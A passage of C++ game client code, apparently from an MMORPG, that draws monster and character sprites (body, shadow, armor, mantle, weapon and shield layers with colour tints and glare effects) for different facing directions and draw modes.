			else if (_tmp_sOwnerType == 89) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 91) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		}else
		{	cFrame -= 4;
			if (_tmp_sAppr2 != 0)
			{	iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
				cFrame = _tmp_sAppr2 -1;
			}
			else if (_tmp_sOwnerType == 66) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 67) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 68) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 69) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 73) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 81) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 86) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 87) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 89) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 91) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
			else iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
		}
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iArmArmorIndex  = -1;
		iBodyArmorIndex = -1;
		iPantsIndex     = -1;
		iBootsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		iDrawMode = 0;
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, cFrame);

	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX, sY, dwTime, _tmp_sOwnerType);
		if (iDrawMode == 1) // Etrange, 1 semble impossible avec des mobs !
		{	if (_cDrawingOrder[_tmp_cDir] == 1)
			{	if (iWeaponIndex != -1)
				{	if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY,  cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
					DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
					switch (iWeaponGlare) {
					case 0: break;
					case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
					case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}	}
				switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
				case 10: // Slime
				case 35: // Energy Sphere
				
				case 81: // Abaddon
				case 91: // Gate
					break;
				default:
					if (m_cDetailLevel != 0) {
						if (sX < 50)
							 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, cFrame, dwTime);
						else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, cFrame, dwTime);
					}
					break;
				}
				if (_tmp_sOwnerType == 35)
					m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

				if (_tmp_sOwnerType == 81) // Abaddon
				{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				}else if (bInv == TRUE)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				else
				{	if ((_tmp_iStatus & 0x40) != 0)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, cFrame, dwTime);
				}
				SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
					     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);

				if ((iHairIndex != -1) && (iHelmIndex == -1))
				{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
					m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, iR, iG, iB, dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 1))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iPantsIndex != -1)
				{	if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
				}

				if (iArmArmorIndex != -1)
				{	if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 0))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iBodyArmorIndex != -1)
				{	if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
				}

				if (iHelmIndex != -1)
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
				}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iShieldIndex != -1)
				{	if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
					switch (iShieldGlare) {
					case 0: break;
					case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
					case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 4 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 4 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}	}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}
			}else
			{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
				case 10: // Slime
				case 35: // Energy Sphere
				
				case 81: // Abaddon
				case 91: // Gate
					break;
				default:
					if (m_cDetailLevel != 0) {
						if (sX < 50)
							 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, cFrame, dwTime);
						else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, cFrame, dwTime);
					}
					break;
				}
				if (_tmp_sOwnerType == 35)
					m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

				if (_tmp_sOwnerType == 81) // Abaddon
				{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				}else if (bInv == TRUE)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				else
				{	if ((_tmp_iStatus & 0x40) != 0)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, cFrame, dwTime);
				}
				SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
					     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);

				if ((iHairIndex != -1) && (iHelmIndex == -1))
				{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
					m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, iR, iG, iB, dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 1))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iPantsIndex != -1)
				{	if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
				}

				if (iArmArmorIndex != -1)
				{	if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 0))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iBodyArmorIndex != -1)
				{	if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
				}

				if (iHelmIndex != -1)
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
				}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iShieldIndex != -1)
				{	if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
					switch (iShieldGlare) {
					case 0: break;
					case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
					case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 4 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 4 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}	}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iWeaponIndex != -1)
				{	if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY, cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
					DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
					switch (iWeaponGlare) {
					case 0: break;
					case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
					case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}	}

			if ((_tmp_iStatus & 0x20) != 0) 	// Berserk
				m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, cFrame, 0, -5, -5, dwTime);
			DrawAngel(16+(_tmp_cDir - 1), sX+20, sY-20, cFrame%4, dwTime);
			DrawWanted(sX, sY, dwTime);
			CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

			//50Cent - Capture The Flag
			DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);

		}else // DrawMode != 1
		{	if (_cDrawingOrder[_tmp_cDir] == 1)
			{	if (iWeaponIndex != -1)
				{	if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY,  cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
					DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
					switch (iWeaponGlare) {
					case 0: break;
					case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
					case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}	}
				switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
				case 10: // Slime
				case 35: // Energy Sphere
				
				case 81: // Abaddon
				case 91: // Gate
					break;
				default:
					if (m_cDetailLevel != 0)
					{	if (sX < 50)
							 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
						else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
					}
					break;
				}
				if (_tmp_sOwnerType == 35)
					m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

				if (_tmp_sOwnerType == 81) // Abaddon
				{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				}else if (bInv == TRUE)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				else {
					if ((_tmp_iStatus & 0x40) != 0)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, cFrame, dwTime);
				}
				SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
					     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);

				if ((iHairIndex != -1) && (iHelmIndex == -1))
				{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
					m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, iR, iG, iB, dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 1)) {
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iPantsIndex != -1)
				{	if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
				}

				if (iArmArmorIndex != -1)
				{	if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 0)) {
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iBodyArmorIndex != -1)
				{	if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
				}

				if (iHelmIndex != -1)
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
				}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iShieldIndex != -1)
				{	if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
					switch (iShieldGlare) {
					case 0: break;
					case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
					case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
					}
				}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}
			}else
			{	switch (_tmp_sOwnerType) {
				case 10: // Slime
				case 35: // Energy Sphere
				
				case 81: // Abaddon
				case 91: // Gate
					break;
				default:
					if (m_cDetailLevel != 0) {
						if (sX < 50)
							 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, cFrame, dwTime);
						else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, cFrame, dwTime);
					}
					break;
				}
				if (_tmp_sOwnerType == 35)
					m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

				if (_tmp_sOwnerType == 81) // Abaddon
				{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				}else if (bInv == TRUE)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
				else {
					if ((_tmp_iStatus & 0x40) != 0)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, cFrame, dwTime);
				}

				SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
